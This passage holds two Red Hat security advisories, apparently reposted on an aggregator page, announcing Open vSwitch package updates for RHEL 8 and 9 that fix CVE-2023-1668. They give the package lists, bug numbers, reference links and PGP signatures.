Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch2.17 is now available in Fast Datapath for Red Hat  
Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 9 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-9] Fast Datapath Release (BZ#2177686)

* [CT] Inner header of ICMP related traffic does not get DNATed  
(BZ#2178203)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177686 - [23.C RHEL-9] Fast Datapath Release  
2178203 - [CT] Inner header of ICMP related traffic does not get DNATed

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 9:

Source:  
openvswitch2.17-2.17.0-77.el9fdp.src.rpm

aarch64:  
openvswitch2.17-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.aarch64.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.aarch64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.aarch64.rpm

noarch:  
openvswitch2.17-test-2.17.0-77.el9fdp.noarch.rpm

ppc64le:  
openvswitch2.17-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.ppc64le.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.ppc64le.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.ppc64le.rpm

s390x:  
openvswitch2.17-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.s390x.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.s390x.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.s390x.rpm

x86_64:  
openvswitch2.17-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.x86_64.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.x86_64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaINzjgjWX9erEAQgdjQ//RB88e003zD0P5VKlgcd8xQcxdHy8WkKp  
BksrNOZnjGEeUw3qyqjQaADC8SlmvEWCg7Vh3wxZvAE30nOQOHLZ3iZufvxHAxi3  
0MSyKGolC2W7jCtgEA3TMVu3yx/Pb5sh02iRh32Bp4q7B76blUt+MqR/6APyAHFP  
EOxCrGL4Uif1rC96U1tlexErOmHRdE/hSso/mw5NtP6E5kt27qiNJEsQC4ep3Csi  
61e6+T/dgH/cHso3t5JNX9zdijrSqJmXfc9G3gGxlfkYgUJo7su04Rpx757ufGi2  
sMKR6cEJJKB7kfyhGFys8txsJhsXG5sAMuLDowHEPn/TBtRq734EFIL+A3ksMUTR  
RmBDUqgycibn3uHkG3MOG9/JhJbCp6xA2B8I74ygWezjvbnLqILHvOzWO8PgXypV  
wIwlGBdtcICL2ORDelPznaCf/SltjFrOg0cOxo1IPIMakHYRsEuocyEnzpRH7IVl  
05x1i964/ur4B6j5m6qVJa9aX3eADHl2Tzkc9ykeYJ/Wv/W+LNksOTuxwRknGxn5  
MmMrMO87eF7uxALARIlo6UjggmT38A39cy/rdrlmT0BUHafLGe8sz7vwhklRwoAw  
GoEsPaDmN4hotvh94Unf89SwSXKKp1S8XG1+DIl091Rg1nkcSudBoC3k4PmYRSY+  
7qP7ZWcYyvk=xchJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1769-01

Red Hat Security Advisory 2023-1766-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch3.1 security update  
Advisory ID:       RHSA-2023:1766-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1766  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch3.1 is now available in Fast Datapath for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-8] Fast Datapath Release (BZ#2177687)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

Users of openvswitch3.1 are advised to upgrade to these updated packages,  
which fixes these bugs.

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177687 - [23.C RHEL-8] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch3.1-3.1.0-17.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.aarch64.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.aarch64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.aarch64.rpm

noarch:  
openvswitch3.1-test-3.1.0-17.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.ppc64le.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.ppc64le.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.s390x.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.s390x.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.x86_64.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.x86_64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaINzjgjWX9erEAQgq0Q//bKc0CM9R2JeB8Czrus6oTHhXpBt+ykbW  
ynNuGnQFwrIK2ToqHAvCXfbavCbP+ENebsxzCfKBzE0kL2KrTq5v/cgcETyWsc2O  
VJ+LxTeYOjuKXObO+aAQujcEpU89FiwXPcdyBr0ayuLof+tLuem78VQoPyDnMBmF  
zB9RIIOjznXOFPhwej8DokAziEVtjgKwWuh1/V4nYquIAFyP7hm4IQ26OkVLxhZG  
LNCXmHYFxwgqXBn9vEmTNuAjRZFHkyIHHH6ShZHwz//tK4EbwW5v+IvQpCa6rkHT  
beZh2ivr7t07J27xheD7AZPmat1dlOBmSo3yy67W9hC2t1YGp0ryaTyq1SZt2+h0  
a8+CF8870BjZidp6tLsRc5EMz+/WSoRatYn92WOfKnAyrMfSXgZvqpq94nv+oYJw  
uLA3FMc2mae7JDWVkl/K1TT8r2b9aUQk8qL0w1onAQComtOFbNzOvWfwQMp2PMZ9  
l13TQpJGEhu5NiXKUeQZvT+XLyuZ80DsyyPES080CQ3IdJ0uCcMpQDb346PJUfG6  
/kSMi0LiPRArFgQXWfL4EWNKPnEBeLJQmaFO7grNPAi8k4cuuiHbx2NTByAdQKFg  
ayKoM1ntNB6KGBVQnhScsELj6lFZp/RiBWpocpj1nHVxlIdwmbIqU8UIDK26QvrJ  
xi7Xxtsl0ZQ=aTXK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux